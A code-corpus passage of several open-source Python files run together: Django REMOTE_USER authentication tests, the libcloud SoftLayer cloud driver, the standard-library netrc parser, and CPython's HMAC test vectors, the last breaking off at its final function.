self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
response = self.client.get('/remote_user/', REMOTE_USER=None)
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
response = self.client.get('/remote_user/', REMOTE_USER='')
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
def test_unknown_user(self):
"""
Tests the case where the username passed in the header does not exist
as a User.
"""
num_users = User.objects.count()
response = self.client.get('/remote_user/', REMOTE_USER='newuser')
self.assertEqual(response.context['user'].username, 'newuser')
self.assertEqual(User.objects.count(), num_users + 1)
User.objects.get(username='newuser')
# Another request with same user should not create any new users.
response = self.client.get('/remote_user/', REMOTE_USER='newuser')
self.assertEqual(User.objects.count(), num_users + 1)
def test_known_user(self):
"""
Tests the case where the username passed in the header is a valid User.
"""
User.objects.create(username='knownuser')
User.objects.create(username='knownuser2')
num_users = User.objects.count()
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user)
self.assertEqual(response.context['user'].username, 'knownuser')
self.assertEqual(User.objects.count(), num_users)
# Test that a different user passed in the headers causes the new user
# to be logged in.
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user2)
self.assertEqual(response.context['user'].username, 'knownuser2')
self.assertEqual(User.objects.count(), num_users)
def test_last_login(self):
"""
Tests that a user's last_login is set the first time they make a
request but not updated in subsequent requests with the same session.
"""
user = User.objects.create(username='knownuser')
# Set last_login to something so we can determine if it changes.
default_login = datetime(2000, 1, 1)
if settings.USE_TZ:
default_login = default_login.replace(tzinfo=timezone.utc)
user.last_login = default_login
user.save()
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user)
self.assertNotEqual(default_login, response.context['user'].last_login)
user = User.objects.get(username='knownuser')
user.last_login = default_login
user.save()
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user)
self.assertEqual(default_login, response.context['user'].last_login)
def test_header_disappears(self):
"""
Tests that a logged in user is logged out automatically when
the REMOTE_USER header disappears during the same browser session.
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/', REMOTE_USER=self.known_user)
self.assertEqual(response.context['user'].username, 'knownuser')
# During the session, the REMOTE_USER header disappears. Should trigger logout.
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].is_anonymous(), True)
# verify the remoteuser middleware will not remove a user
# authenticated via another backend
User.objects.create_user(username='modeluser', password='foo')
self.client.login(username='modeluser', password='foo')
authenticate(username='modeluser', password='foo')
response = self.client.get('/remote_user/')
self.assertEqual(response.context['user'].username, 'modeluser')
def test_user_switch_forces_new_login(self):
"""
Tests that if the username in the header changes between requests
that the original user is logged out
"""
User.objects.create(username='knownuser')
# Known user authenticates
response = self.client.get('/remote_user/',
**{'REMOTE_USER': self.known_user})
self.assertEqual(response.context['user'].username, 'knownuser')
# During the session, the REMOTE_USER changes to a different user.
response = self.client.get('/remote_user/',
**{'REMOTE_USER': "newnewuser"})
# Ensure that the current user is not the prior remote_user
# In backends that create a new user, username is "newnewuser"
# In backends that do not create new users, it is '' (anonymous user)
self.assertNotEqual(response.context['user'].username, 'knownuser')
def tearDown(self):
"""Restores settings to avoid breaking other tests."""
settings.MIDDLEWARE_CLASSES = self.curr_middleware
settings.AUTHENTICATION_BACKENDS = self.curr_auth
class RemoteUserNoCreateBackend(RemoteUserBackend):
"""Backend that doesn't create unknown users."""
create_unknown_user = False
@skipIfCustomUser
class RemoteUserNoCreateTest(RemoteUserTest):
"""
Contains the same tests as RemoteUserTest, but using a custom auth backend
class that doesn't create unknown users.
"""
backend =\
'django.contrib.auth.tests.remote_user.RemoteUserNoCreateBackend'
def test_unknown_user(self):
num_users = User.objects.count()
response = self.client.get('/remote_user/', REMOTE_USER='newuser')
self.assertTrue(response.context['user'].is_anonymous())
self.assertEqual(User.objects.count(), num_users)
class CustomRemoteUserBackend(RemoteUserBackend):
"""
Backend that overrides RemoteUserBackend methods.
"""
def clean_username(self, username):
"""
Grabs username before the @ character.
"""
return username.split('@')[0]
def configure_user(self, user):
"""
Sets user's email address.
"""
user.email = '[email protected]'
user.save()
return user
@skipIfCustomUser
class RemoteUserCustomTest(RemoteUserTest):
"""
Tests a custom RemoteUserBackend subclass that overrides the clean_username
and configure_user methods.
"""
backend =\
'django.contrib.auth.tests.remote_user.CustomRemoteUserBackend'
# REMOTE_USER strings with email addresses for the custom backend to
# clean.
known_user = '[email protected]'
known_user2 = '[email protected]'
def test_known_user(self):
"""
The strings passed in REMOTE_USER should be cleaned and the known users
should not have been configured with an email address.
"""
super(RemoteUserCustomTest, self).test_known_user()
self.assertEqual(User.objects.get(username='knownuser').email, '')
self.assertEqual(User.objects.get(username='knownuser2').email, '')
def test_unknown_user(self):
"""
The unknown user created should be configured with an email address.
"""
super(RemoteUserCustomTest, self).test_unknown_user()
newuser = User.objects.get(username='newuser')
self.assertEqual(newuser.email, '[email protected]')
|
agpl-3.0
|
mtekel/libcloud
|
libcloud/compute/drivers/softlayer.py
|
22
|
16262
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Softlayer driver
"""
import time
try:
from Crypto.PublicKey import RSA
crypto = True
except ImportError:
crypto = False
from libcloud.common.softlayer import SoftLayerConnection, SoftLayerException
from libcloud.compute.types import Provider, NodeState
from libcloud.compute.base import NodeDriver, Node, NodeLocation, NodeSize, \
NodeImage, KeyPair
from libcloud.compute.types import KeyPairDoesNotExistError
DEFAULT_DOMAIN = 'example.com'
DEFAULT_CPU_SIZE = 1
DEFAULT_RAM_SIZE = 2048
DEFAULT_DISK_SIZE = 100
DATACENTERS = {
'hou02': {'country': 'US'},
'sea01': {'country': 'US', 'name': 'Seattle - West Coast U.S.'},
'wdc01': {'country': 'US', 'name': 'Washington, DC - East Coast U.S.'},
'dal01': {'country': 'US'},
'dal02': {'country': 'US'},
'dal04': {'country': 'US'},
'dal05': {'country': 'US', 'name': 'Dallas - Central U.S.'},
'dal06': {'country': 'US'},
'dal07': {'country': 'US'},
'sjc01': {'country': 'US', 'name': 'San Jose - West Coast U.S.'},
'sng01': {'country': 'SG', 'name': 'Singapore - Southeast Asia'},
'ams01': {'country': 'NL', 'name': 'Amsterdam - Western Europe'},
'tok02': {'country': 'JP', 'name': 'Tokyo - Japan'},
}
NODE_STATE_MAP = {
'RUNNING': NodeState.RUNNING,
'HALTED': NodeState.UNKNOWN,
'PAUSED': NodeState.UNKNOWN,
'INITIATING': NodeState.PENDING
}
SL_BASE_TEMPLATES = [
{
'name': '1 CPU, 1GB ram, 25GB',
'ram': 1024,
'disk': 25,
'cpus': 1,
}, {
'name': '1 CPU, 1GB ram, 100GB',
'ram': 1024,
'disk': 100,
'cpus': 1,
}, {
'name': '1 CPU, 2GB ram, 100GB',
'ram': 2 * 1024,
'disk': 100,
'cpus': 1,
}, {
'name': '1 CPU, 4GB ram, 100GB',
'ram': 4 * 1024,
'disk': 100,
'cpus': 1,
}, {
'name': '2 CPU, 2GB ram, 100GB',
'ram': 2 * 1024,
'disk': 100,
'cpus': 2,
}, {
'name': '2 CPU, 4GB ram, 100GB',
'ram': 4 * 1024,
'disk': 100,
'cpus': 2,
}, {
'name': '2 CPU, 8GB ram, 100GB',
'ram': 8 * 1024,
'disk': 100,
'cpus': 2,
}, {
'name': '4 CPU, 4GB ram, 100GB',
'ram': 4 * 1024,
'disk': 100,
'cpus': 4,
}, {
'name': '4 CPU, 8GB ram, 100GB',
'ram': 8 * 1024,
'disk': 100,
'cpus': 4,
}, {
'name': '6 CPU, 4GB ram, 100GB',
'ram': 4 * 1024,
'disk': 100,
'cpus': 6,
}, {
'name': '6 CPU, 8GB ram, 100GB',
'ram': 8 * 1024,
'disk': 100,
'cpus': 6,
}, {
'name': '8 CPU, 8GB ram, 100GB',
'ram': 8 * 1024,
'disk': 100,
'cpus': 8,
}, {
'name': '8 CPU, 16GB ram, 100GB',
'ram': 16 * 1024,
'disk': 100,
'cpus': 8,
}]
SL_TEMPLATES = {}
for i, template in enumerate(SL_BASE_TEMPLATES):
# Add local disk templates
local = template.copy()
local['local_disk'] = True
SL_TEMPLATES[i] = local
class SoftLayerNodeDriver(NodeDriver):
"""
SoftLayer node driver
Extra node attributes:
- password: root password
- hourlyRecurringFee: hourly price (if applicable)
- recurringFee : flat rate (if applicable)
- recurringMonths : The number of months in which the recurringFee
will be incurred.
"""
connectionCls = SoftLayerConnection
name = 'SoftLayer'
website = 'http://www.softlayer.com/'
type = Provider.SOFTLAYER
features = {'create_node': ['generates_password', 'ssh_key']}
def _to_node(self, host):
try:
password = \
host['operatingSystem']['passwords'][0]['password']
except (IndexError, KeyError):
password = None
hourlyRecurringFee = host.get('billingItem', {}).get(
'hourlyRecurringFee', 0)
recurringFee = host.get('billingItem', {}).get('recurringFee', 0)
recurringMonths = host.get('billingItem', {}).get('recurringMonths', 0)
createDate = host.get('createDate', None)
# When machine is launching it gets state halted
# we change this to pending
state = NODE_STATE_MAP.get(host['powerState']['keyName'],
NodeState.UNKNOWN)
if not password and state == NodeState.UNKNOWN:
state = NODE_STATE_MAP['INITIATING']
public_ips = []
private_ips = []
if 'primaryIpAddress' in host:
public_ips.append(host['primaryIpAddress'])
if 'primaryBackendIpAddress' in host:
private_ips.append(host['primaryBackendIpAddress'])
image = host.get('operatingSystem', {}).get('softwareLicense', {}) \
.get('softwareDescription', {}) \
.get('longDescription', None)
return Node(
id=host['id'],
name=host['fullyQualifiedDomainName'],
state=state,
public_ips=public_ips,
private_ips=private_ips,
driver=self,
extra={
'hostname': host['hostname'],
'fullyQualifiedDomainName': host['fullyQualifiedDomainName'],
'password': password,
'maxCpu': host.get('maxCpu', None),
'datacenter': host.get('datacenter', {}).get('longName', None),
'maxMemory': host.get('maxMemory', None),
'image': image,
'hourlyRecurringFee': hourlyRecurringFee,
'recurringFee': recurringFee,
'recurringMonths': recurringMonths,
'created': createDate,
}
)
def destroy_node(self, node):
self.connection.request(
'SoftLayer_Virtual_Guest', 'deleteObject', id=node.id
)
return True
def reboot_node(self, node):
self.connection.request(
'SoftLayer_Virtual_Guest', 'rebootSoft', id=node.id
)
return True
def ex_stop_node(self, node):
self.connection.request(
'SoftLayer_Virtual_Guest', 'powerOff', id=node.id
)
return True
def ex_start_node(self, node):
self.connection.request(
'SoftLayer_Virtual_Guest', 'powerOn', id=node.id
)
return True
def _get_order_information(self, node_id, timeout=1200, check_interval=5):
mask = {
'billingItem': '',
'powerState': '',
'operatingSystem': {'passwords': ''},
'provisionDate': '',
}
for i in range(0, timeout, check_interval):
res = self.connection.request(
'SoftLayer_Virtual_Guest',
'getObject',
id=node_id,
object_mask=mask
).object
if res.get('provisionDate', None):
return res
time.sleep(check_interval)
raise SoftLayerException('Timeout on getting node details')
def create_node(self, **kwargs):
"""Create a new SoftLayer node
@inherits: :class:`NodeDriver.create_node`
:keyword ex_domain: e.g. libcloud.org
:type ex_domain: ``str``
:keyword ex_cpus: e.g. 2
:type ex_cpus: ``int``
:keyword ex_disk: e.g. 100
:type ex_disk: ``int``
:keyword ex_ram: e.g. 2048
:type ex_ram: ``int``
:keyword ex_bandwidth: e.g. 100
:type ex_bandwidth: ``int``
:keyword ex_local_disk: e.g. True
:type ex_local_disk: ``bool``
:keyword ex_datacenter: e.g. Dal05
:type ex_datacenter: ``str``
:keyword ex_os: e.g. UBUNTU_LATEST
:type ex_os: ``str``
:keyword ex_keyname: The name of the key pair
:type ex_keyname: ``str``
"""
name = kwargs['name']
os = 'DEBIAN_LATEST'
if 'ex_os' in kwargs:
os = kwargs['ex_os']
elif 'image' in kwargs:
os = kwargs['image'].id
size = kwargs.get('size', NodeSize(id=123, name='Custom', ram=None,
disk=None, bandwidth=None,
price=None,
driver=self.connection.driver))
ex_size_data = SL_TEMPLATES.get(int(size.id)) or {}
# plan keys are ints
cpu_count = kwargs.get('ex_cpus') or ex_size_data.get('cpus') or \
DEFAULT_CPU_SIZE
ram = kwargs.get('ex_ram') or ex_size_data.get('ram') or \
DEFAULT_RAM_SIZE
bandwidth = kwargs.get('ex_bandwidth') or size.bandwidth or 10
hourly = 'true' if kwargs.get('ex_hourly', True) else 'false'
local_disk = 'true'
if ex_size_data.get('local_disk') is False:
local_disk = 'false'
if kwargs.get('ex_local_disk') is False:
local_disk = 'false'
disk_size = DEFAULT_DISK_SIZE
if size.disk:
disk_size = size.disk
if kwargs.get('ex_disk'):
disk_size = kwargs.get('ex_disk')
datacenter = ''
if 'ex_datacenter' in kwargs:
datacenter = kwargs['ex_datacenter']
elif 'location' in kwargs:
datacenter = kwargs['location'].id
domain = kwargs.get('ex_domain')
if domain is None:
if name.find('.') != -1:
domain = name[name.find('.') + 1:]
if domain is None:
# TODO: domain is a required argument for the Sofylayer API, but it
# it shouldn't be.
domain = DEFAULT_DOMAIN
newCCI = {
'hostname': name,
'domain': domain,
'startCpus': cpu_count,
'maxMemory': ram,
'networkComponents': [{'maxSpeed': bandwidth}],
'hourlyBillingFlag': hourly,
'operatingSystemReferenceCode': os,
'localDiskFlag': local_disk,
'blockDevices': [
{
'device': '0',
'diskImage': {
'capacity': disk_size,
}
}
]
}
if datacenter:
newCCI['datacenter'] = {'name': datacenter}
if 'ex_keyname' in kwargs:
newCCI['sshKeys'] = [
{
'id': self._key_name_to_id(kwargs['ex_keyname'])
}
]
res = self.connection.request(
'SoftLayer_Virtual_Guest', 'createObject', newCCI
).object
node_id = res['id']
raw_node = self._get_order_information(node_id)
return self._to_node(raw_node)
def list_key_pairs(self):
result = self.connection.request(
'SoftLayer_Account', 'getSshKeys'
).object
elems = [x for x in result]
key_pairs = self._to_key_pairs(elems=elems)
return key_pairs
def get_key_pair(self, name):
key_id = self._key_name_to_id(name=name)
result = self.connection.request(
'SoftLayer_Security_Ssh_Key', 'getObject', id=key_id
).object
return self._to_key_pair(result)
# TODO: Check this with the libcloud guys,
# can we create new dependencies?
def create_key_pair(self, name, ex_size=4096):
if crypto is False:
raise NotImplementedError('create_key_pair needs'
'the pycrypto library')
key = RSA.generate(ex_size)
new_key = {
'key': key.publickey().exportKey('OpenSSH'),
'label': name,
'notes': '',
}
result = self.connection.request(
'SoftLayer_Security_Ssh_Key', 'createObject', new_key
).object
result['private'] = key.exportKey('PEM')
return self._to_key_pair(result)
def import_key_pair_from_string(self, name, key_material):
new_key = {
'key': key_material,
'label': name,
'notes': '',
}
result = self.connection.request(
'SoftLayer_Security_Ssh_Key', 'createObject', new_key
).object
key_pair = self._to_key_pair(result)
return key_pair
def delete_key_pair(self, key_pair):
key = self._key_name_to_id(key_pair)
result = self.connection.request(
'SoftLayer_Security_Ssh_Key', 'deleteObject', id=key
).object
return result
def _to_image(self, img):
return NodeImage(
id=img['template']['operatingSystemReferenceCode'],
name=img['itemPrice']['item']['description'],
driver=self.connection.driver
)
def list_images(self, location=None):
result = self.connection.request(
'SoftLayer_Virtual_Guest', 'getCreateObjectOptions'
).object
return [self._to_image(i) for i in result['operatingSystems']]
def _to_size(self, id, size):
return NodeSize(
id=id,
name=size['name'],
ram=size['ram'],
disk=size['disk'],
bandwidth=size.get('bandwidth'),
price=None,
driver=self.connection.driver,
)
def list_sizes(self, location=None):
return [self._to_size(id, s) for id, s in SL_TEMPLATES.items()]
def _to_loc(self, loc):
country = 'UNKNOWN'
loc_id = loc['template']['datacenter']['name']
name = loc_id
if loc_id in DATACENTERS:
country = DATACENTERS[loc_id]['country']
name = DATACENTERS[loc_id].get('name', loc_id)
return NodeLocation(id=loc_id, name=name,
country=country, driver=self)
def list_locations(self):
res = self.connection.request(
'SoftLayer_Virtual_Guest', 'getCreateObjectOptions'
).object
return [self._to_loc(l) for l in res['datacenters']]
def list_nodes(self):
mask = {
'virtualGuests': {
'powerState': '',
'hostname': '',
'maxMemory': '',
'datacenter': '',
'operatingSystem': {'passwords': ''},
'billingItem': '',
},
}
res = self.connection.request(
'SoftLayer_Account',
'getVirtualGuests',
object_mask=mask
).object
return [self._to_node(h) for h in res]
def _to_key_pairs(self, elems):
key_pairs = [self._to_key_pair(elem=elem) for elem in elems]
return key_pairs
def _to_key_pair(self, elem):
key_pair = KeyPair(name=elem['label'],
public_key=elem['key'],
fingerprint=elem['fingerprint'],
private_key=elem.get('private', None),
driver=self,
extra={'id': elem['id']})
return key_pair
def _key_name_to_id(self, name):
result = self.connection.request(
'SoftLayer_Account', 'getSshKeys'
).object
key_id = [x for x in result if x['label'] == name]
if len(key_id) == 0:
raise KeyPairDoesNotExistError(name, self)
else:
return int(key_id[0]['id'])
|
apache-2.0
|
Gravecorp/Gap
|
packages/IronPython.StdLib.2.7.3/content/Lib/netrc.py
|
168
|
4576
|
"""An object-oriented interface to .netrc files."""
# Module and documentation by Eric S. Raymond, 21 Dec 1998
import os, shlex
__all__ = ["netrc", "NetrcParseError"]
class NetrcParseError(Exception):
"""Exception raised on syntax errors in the .netrc file."""
def __init__(self, msg, filename=None, lineno=None):
self.filename = filename
self.lineno = lineno
self.msg = msg
Exception.__init__(self, msg)
def __str__(self):
return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)
class netrc:
def __init__(self, file=None):
if file is None:
try:
file = os.path.join(os.environ['HOME'], ".netrc")
except KeyError:
raise IOError("Could not find .netrc: $HOME is not set")
self.hosts = {}
self.macros = {}
with open(file) as fp:
self._parse(file, fp)
def _parse(self, file, fp):
lexer = shlex.shlex(fp)
lexer.wordchars += r"""!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"""
lexer.commenters = lexer.commenters.replace('#', '')
while 1:
# Look for a machine, default, or macdef top-level keyword
toplevel = tt = lexer.get_token()
if not tt:
break
elif tt[0] == '#':
# seek to beginning of comment, in case reading the token put
# us on a new line, and then skip the rest of the line.
pos = len(tt) + 1
lexer.instream.seek(-pos, 1)
lexer.instream.readline()
continue
elif tt == 'machine':
entryname = lexer.get_token()
elif tt == 'default':
entryname = 'default'
elif tt == 'macdef': # Just skip to end of macdefs
entryname = lexer.get_token()
self.macros[entryname] = []
lexer.whitespace = ' \t'
while 1:
line = lexer.instream.readline()
if not line or line == '\012':
lexer.whitespace = ' \t\r\n'
break
self.macros[entryname].append(line)
continue
else:
raise NetrcParseError(
"bad toplevel token %r" % tt, file, lexer.lineno)
# We're looking at start of an entry for a named machine or default.
login = ''
account = password = None
self.hosts[entryname] = {}
while 1:
tt = lexer.get_token()
if (tt.startswith('#') or
tt in {'', 'machine', 'default', 'macdef'}):
if password:
self.hosts[entryname] = (login, account, password)
lexer.push_token(tt)
break
else:
raise NetrcParseError(
"malformed %s entry %s terminated by %s"
% (toplevel, entryname, repr(tt)),
file, lexer.lineno)
elif tt == 'login' or tt == 'user':
login = lexer.get_token()
elif tt == 'account':
account = lexer.get_token()
elif tt == 'password':
password = lexer.get_token()
else:
raise NetrcParseError("bad follower token %r" % tt,
file, lexer.lineno)
def authenticators(self, host):
"""Return a (user, account, password) tuple for given host."""
if host in self.hosts:
return self.hosts[host]
elif 'default' in self.hosts:
return self.hosts['default']
else:
return None
def __repr__(self):
"""Dump the class data in the format of a .netrc file."""
rep = ""
for host in self.hosts.keys():
attrs = self.hosts[host]
rep = rep + "machine "+ host + "\n\tlogin " + repr(attrs[0]) + "\n"
if attrs[1]:
rep = rep + "account " + repr(attrs[1])
rep = rep + "\tpassword " + repr(attrs[2]) + "\n"
for macro in self.macros.keys():
rep = rep + "macdef " + macro + "\n"
for line in self.macros[macro]:
rep = rep + line
rep = rep + "\n"
return rep
if __name__ == '__main__':
print netrc()
|
mpl-2.0
|
adaussy/eclipse-monkey-revival
|
plugins/python/org.eclipse.eclipsemonkey.lang.python/Lib/test/test_hmac.py
|
4
|
13149
|
import hmac
import hashlib
import unittest
import warnings
from test import test_support
class TestVectorsTestCase(unittest.TestCase):
def test_md5_vectors(self):
# Test the HMAC module against test vectors from the RFC.
def md5test(key, data, digest):
h = hmac.HMAC(key, data)
self.assertEqual(h.hexdigest().upper(), digest.upper())
md5test(chr(0x0b) * 16,
"Hi There",
"9294727A3638BB1C13F48EF8158BFC9D")
md5test("Jefe",
"what do ya want for nothing?",
"750c783e6ab0b503eaa86e310a5db738")
md5test(chr(0xAA)*16,
chr(0xDD)*50,
"56be34521d144c88dbb8c733f0e8b3f6")
md5test("".join([chr(i) for i in range(1, 26)]),
chr(0xCD) * 50,
"697eaf0aca3a3aea3a75164746ffaa79")
md5test(chr(0x0C) * 16,
"Test With Truncation",
"56461ef2342edc00f9bab995690efd4c")
md5test(chr(0xAA) * 80,
"Test Using Larger Than Block-Size Key - Hash Key First",
"6b1ab7fe4bd7bf8f0b62e6ce61b9d0cd")
md5test(chr(0xAA) * 80,
("Test Using Larger Than Block-Size Key "
"and Larger Than One Block-Size Data"),
"6f630fad67cda0ee1fb1f562db3aa53e")
def test_sha_vectors(self):
def shatest(key, data, digest):
h = hmac.HMAC(key, data, digestmod=hashlib.sha1)
self.assertEqual(h.hexdigest().upper(), digest.upper())
shatest(chr(0x0b) * 20,
"Hi There",
"b617318655057264e28bc0b6fb378c8ef146be00")
shatest("Jefe",
"what do ya want for nothing?",
"effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
shatest(chr(0xAA)*20,
chr(0xDD)*50,
"125d7342b9ac11cd91a39af48aa17b4f63f175d3")
shatest("".join([chr(i) for i in range(1, 26)]),
chr(0xCD) * 50,
"4c9007f4026250c6bc8414f9bf50c86c2d7235da")
shatest(chr(0x0C) * 20,
"Test With Truncation",
"4c1a03424b55e07fe7f27be1d58bb9324a9a5a04")
shatest(chr(0xAA) * 80,
"Test Using Larger Than Block-Size Key - Hash Key First",
"aa4ae5e15272d00e95705637ce8a3b55ed402112")
shatest(chr(0xAA) * 80,
("Test Using Larger Than Block-Size Key "
"and Larger Than One Block-Size Data"),
"e8e99d0f45237d786d6bbaa7965c7808bbff1a91")
def _rfc4231_test_cases(self, hashfunc):
def hmactest(key, data, hexdigests):
h = hmac.HMAC(key, data, digestmod=hashfunc)
self.assertEqual(h.hexdigest().lower(), hexdigests[hashfunc])
# 4.2. Test Case 1
hmactest(key = '\x0b'*20,
data = 'Hi There',
hexdigests = {
hashlib.sha224: '896fb1128abbdf196832107cd49df33f'
'47b4b1169912ba4f53684b22',
hashlib.sha256: 'b0344c61d8db38535ca8afceaf0bf12b'
'881dc200c9833da726e9376c2e32cff7',
hashlib.sha384: 'afd03944d84895626b0825f4ab46907f'
'15f9dadbe4101ec682aa034c7cebc59c'
'faea9ea9076ede7f4af152e8b2fa9cb6',
hashlib.sha512: '87aa7cdea5ef619d4ff0b4241a1d6cb0'
'2379f4e2ce4ec2787ad0b30545e17cde'
'daa833b7d6b8a702038b274eaea3f4e4'
'be9d914eeb61f1702e696c203a126854',
})
# 4.3. Test Case 2
hmactest(key = 'Jefe',
data = 'what do ya want for nothing?',
hexdigests = {
hashlib.sha224: 'a30e01098bc6dbbf45690f3a7e9e6d0f'
'8bbea2a39e6148008fd05e44',
hashlib.sha256: '5bdcc146bf60754e6a042426089575c7'
'5a003f089d2739839dec58b964ec3843',
hashlib.sha384: 'af45d2e376484031617f78d2b58a6b1b'
'9c7ef464f5a01b47e42ec3736322445e'
'8e2240ca5e69e2c78b3239ecfab21649',
hashlib.sha512: '164b7a7bfcf819e2e395fbe73b56e0a3'
'87bd64222e831fd610270cd7ea250554'
'9758bf75c05a994a6d034f65f8f0e6fd'
'caeab1a34d4a6b4b636e070a38bce737',
})
# 4.4. Test Case 3
hmactest(key = '\xaa'*20,
data = '\xdd'*50,
hexdigests = {
hashlib.sha224: '7fb3cb3588c6c1f6ffa9694d7d6ad264'
'9365b0c1f65d69d1ec8333ea',
hashlib.sha256: '773ea91e36800e46854db8ebd09181a7'
'2959098b3ef8c122d9635514ced565fe',
hashlib.sha384: '88062608d3e6ad8a0aa2ace014c8a86f'
'0aa635d947ac9febe83ef4e55966144b'
'2a5ab39dc13814b94e3ab6e101a34f27',
hashlib.sha512: 'fa73b0089d56a284efb0f0756c890be9'
'b1b5dbdd8ee81a3655f83e33b2279d39'
'bf3e848279a722c806b485a47e67c807'
'b946a337bee8942674278859e13292fb',
})
# 4.5. Test Case 4
hmactest(key = ''.join([chr(x) for x in xrange(0x01, 0x19+1)]),
data = '\xcd'*50,
hexdigests = {
hashlib.sha224: '6c11506874013cac6a2abc1bb382627c'
'ec6a90d86efc012de7afec5a',
hashlib.sha256: '82558a389a443c0ea4cc819899f2083a'
'85f0faa3e578f8077a2e3ff46729665b',
hashlib.sha384: '3e8a69b7783c25851933ab6290af6ca7'
'7a9981480850009cc5577c6e1f573b4e'
'6801dd23c4a7d679ccf8a386c674cffb',
hashlib.sha512: 'b0ba465637458c6990e5a8c5f61d4af7'
'e576d97ff94b872de76f8050361ee3db'
'a91ca5c11aa25eb4d679275cc5788063'
'a5f19741120c4f2de2adebeb10a298dd',
})
# 4.7. Test Case 6
hmactest(key = '\xaa'*131,
data = 'Test Using Larger Than Block-Siz'
'e Key - Hash Key First',
hexdigests = {
hashlib.sha224: '95e9a0db962095adaebe9b2d6f0dbce2'
'd499f112f2d2b7273fa6870e',
hashlib.sha256: '60e431591ee0b67f0d8a26aacbf5b77f'
'8e0bc6213728c5140546040f0ee37f54',
hashlib.sha384: '4ece084485813e9088d2c63a041bc5b4'
'4f9ef1012a2b588f3cd11f05033ac4c6'
'0c2ef6ab4030fe8296248df163f44952',
hashlib.sha512: '80b24263c7c1a3ebb71493c1dd7be8b4'
'9b46d1f41b4aeec1121b013783f8f352'
'6b56d037e05f2598bd0fd2215d6a1e52'
'95e64f73f63f0aec8b915a985d786598',
})
# 4.8. Test Case 7
hmactest(key = '\xaa'*131,
data = 'This is a test using a larger th'
'an block-size key and a larger t'
'han block-size data. The key nee'
'ds to be hashed before being use'
'd by the HMAC algorithm.',
hexdigests = {
hashlib.sha224: '3a854166ac5d9f023f54d517d0b39dbd'
'946770db9c2b95c9f6f565d1',
hashlib.sha256: '9b09ffa71b942fcb27635fbcd5b0e944'
'bfdc63644f0713938a7f51535c3a35e2',
hashlib.sha384: '6617178e941f020d351e2f254e8fd32c'
'602420feb0b8fb9adccebb82461e99c5'
'a678cc31e799176d3860e6110c46523e',
hashlib.sha512: 'e37b6a775dc87dbaa4dfa9f96e5e3ffd'
'debd71f8867289865df5a32d20cdc944'
'b6022cac3c4982b10d5eeb55c3e4de15'
'134676fb6de0446065c97440fa8c6a58',
})
def test_sha224_rfc4231(self):
self._rfc4231_test_cases(hashlib.sha224)
def test_sha256_rfc4231(self):
self._rfc4231_test_cases(hashlib.sha256)
def test_sha384_rfc4231(self):
self._rfc4231_test_cases(hashlib.sha384)
def test_sha512_rfc4231(self):
self._rfc4231_test_cases(hashlib.sha512)
def test_legacy_block_size_warnings(self):
class MockCrazyHash(object):
"""Ain't no block_size attribute here."""
def __init__(self, *args):
self._x = hashlib.sha1(*args)
self.digest_size = self._x.digest_size
def update(self, v):
self._x.update(v)
def digest(self):
return self._x.digest()
with warnings.catch_warnings():
warnings.simplefilter('error', RuntimeWarning)
with self.assertRaises(RuntimeWarning):
hmac.HMAC('a', 'b', digestmod=MockCrazyHash)
self.fail('Expected warning about missing block_size')
MockCrazyHash.block_size = 1
with self.assertRaises(RuntimeWarning):
hmac.HMAC('a', 'b', digestmod=MockCrazyHash)
self.fail('Expected warning about small block_size')
class ConstructorTestCase(unittest.TestCase):
def test_normal(self):
# Standard constructor call.
failed = 0
try:
h = hmac.HMAC("key")
except:
self.fail("Standard constructor call raised exception.")
def test_withtext(self):
# Constructor call with text.
try:
h = hmac.HMAC("key", "hash this!")
except:
self.fail("Constructor call with text argument raised exception.")
def test_withmodule(self):
# Constructor call with text and digest module.
try:
h = hmac.HMAC("key", "", hashlib.sha1)
except:
self.fail("Constructor call with hashlib.sha1 raised exception.")
class SanityTestCase(unittest.TestCase):
def test_default_is_md5(self):
# Testing if HMAC defaults to MD5 algorithm.
# NOTE: this whitebox test depends on the hmac class internals
h = hmac.HMAC("key")
self.assertTrue(h.digest_cons == hashlib.md5)
def test_exercise_all_methods(self):
# Exercising all methods once.
# This must not raise any exceptions
try:
h = hmac.HMAC("my secret key")
h.update("compute the hash of this text!")
dig = h.digest()
dig = h.hexdigest()
h2 = h.copy()
except:
self.fail("Exception raised during normal usage of HMAC class.")
class CopyTestCase(unittest.TestCase):
def test_attributes(self):
# Testing if attributes are of same type.
h1 = hmac.HMAC("key")
h2 = h1.copy()
self.assertTrue(h1.digest_cons == h2.digest_cons,
"digest constructors don't match.")
self.assertTrue(type(h1.inner) == type(h2.inner),
"Types of inner don't match.")
self.assertTrue(type(h1.outer) == type(h2.outer),
"Types of outer don't match.")
def test_realcopy(self):
# Testing if the copy method created a real copy.
h1 = hmac.HMAC("key")
h2 = h1.copy()
# Using id() in case somebody has overridden __cmp__.
self.assertTrue(id(h1) != id(h2), "No real copy of the HMAC instance.")
self.assertTrue(id(h1.inner) != id(h2.inner),
"No real copy of the attribute 'inner'.")
self.assertTrue(id(h1.outer) != id(h2.outer),
"No real copy of the attribute 'outer'.")
def test_equality(self):
# Testing if the copy has the same digests.
h1 = hmac.HMAC("key")
h1.update("some random text")
h2 = h1.copy()
self.assertTrue(h1.digest() == h2.digest(),
"Digest of copy doesn't match original digest.")
self.assertTrue(h1.hexdigest() == h2.hexdigest(),
"Hexdigest of copy doesn't match original hexdigest.")
def test_main():
